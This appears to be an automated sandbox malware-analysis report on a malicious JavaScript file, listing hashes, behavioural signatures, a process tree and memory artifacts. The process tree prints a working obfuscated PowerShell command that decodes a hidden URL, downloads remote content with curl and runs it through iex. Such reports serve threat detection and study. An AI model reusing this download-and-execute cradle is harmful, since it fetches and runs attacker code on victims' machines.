Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/10/2023, 20:21

General

  • Target

    NQRX0468_5871143.js

  • Size

    270KB

  • MD5

    a2e2da4033a7080a9b5d3fa24d150a8e

  • SHA1

    285433bc8135b46f468fb6d0c374c482b164e938

  • SHA256

    968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727

  • SHA512

    9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908

  • SSDEEP

    1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js
    1⤵
      PID:3100
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:932

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1awbn3p.4qt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/932-0-0x000001E0647C0000-0x000001E0647E2000-memory.dmp

      Filesize

      136KB

    • memory/932-10-0x00007FFC35F40000-0x00007FFC36A01000-memory.dmp

      Filesize

      10.8MB

    • memory/932-11-0x000001E04A0D0000-0x000001E04A0E0000-memory.dmp

      Filesize

      64KB

    • memory/932-12-0x000001E04A0D0000-0x000001E04A0E0000-memory.dmp

      Filesize

      64KB

    • memory/932-13-0x000001E04A0D0000-0x000001E04A0E0000-memory.dmp

      Filesize

      64KB

    • memory/932-16-0x00007FFC35F40000-0x00007FFC36A01000-memory.dmp

      Filesize

      10.8MB